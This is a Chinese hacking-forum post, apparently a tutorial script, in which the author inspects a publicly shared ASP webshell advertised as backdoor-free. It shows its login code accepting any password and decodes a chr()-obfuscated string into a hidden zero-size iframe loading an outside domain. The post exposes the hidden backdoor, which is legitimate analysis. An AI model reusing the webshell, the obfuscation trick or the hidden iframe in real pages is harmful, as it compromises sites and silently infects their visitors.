网安是个很好的学习地方` 我到现在还没有论坛的邀请码希望管理员给个`！www.520hack.com  598208726

 
大家好！
  
      我是    ＴｈｒｅｅＣｏｕｎｔｒｙｓ   叫我TC就可以了`声明我是菜鸟希望高手们多多指教
   
      今天很无聊没事看了看网页 ，然后有把以前的ASP木马跟现在的所谓
     
      十三WEBSHELL终结版无后门源代码看了下` 发现一个很奇怪的事 `
      
       声音不好听我就不录音了！` ~  大家看我操作就可以`
      
       我在机子上安装了NetBox小型的ASP服务器` 
      

     十三WEBSHELL终结版无后门源代码.asp 我们看看这个代码 `！密码123321  呵呵` 这是网上公布出来
     的  我一点都没改过` 我们来看下！就用初始密码` 123321进！
     完全没有问题吧~http://192.168.0.4:8000/ceshi.asp
    
       先退出去`　然后随便输入一个密码`！  大家看好了`！ 还是可以进`  我们在打开源文件`！
       End Function
if session("web2a2dmin")<>UserPass then
  if request.form("pass")<>"" then
    if Serinf(request.form("pass"),pn)=UserPass then
      session("web2a2dmin")=UserPass
      response.redirect url
    else
  rrs"非法登录"
    end if
  else
 si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'>
 <a href='"&SiteURL&"' target='_blank'>"&mname&"</a><hr><form action='"&url&"'
 method='post'>密码：<input name='pass' type='password' size='22'>
 <input type='submit' value='登录'></form><hr>"&Copyright&"</div></center>"
 RRS sI
      
        这一段就是定义登陆信息的一段`  密码根本就没有使用加密函数~！我们把十三WEBSHELL终结版无后门源代码
        加密一下`http://192.168.0.4:8000/ceshi2.asp
        呵呵`  工具没下好`  看到没` 这个是加密过的`  我们在打开试下`还是一样` 随便输入密码`~
       
        还是可以进去`！  怎么回事~ 呵呵`大家心里有数了吧~？我们试着该下`！这个是我改好了的`！
       
        看到没` 这才是验证信息`！正确的`！ ..http;//192.168.0.4：8000/1212.asp
        来分析一下代码`！
       
        我们在
        我把这些代码都整理了一下`  因为时间的问题`我一开始就整理完了`1
       
       
       
       
        m=chr(60)&chr(105)&chr(102)&chr(114)&chr(97)&chr(109)&chr(101)&m&mm&mmm&mmmm
       
          这些都是  ASCII码 `  我都对照好了`
        
         结果就是我给大家看的`！
        
        
<iframe  space  src=http://mnrfi.cn/1.htm   space width=0   space height=0></iframe>

这个是一个字不差的`  我都做了`` 

       知道这是什么东西了没`！ 很眼熟噢`  呵呵` 我不想多说了`！如果大家不相信`可以自己去对照`
      
         你们自己做了后在对照`！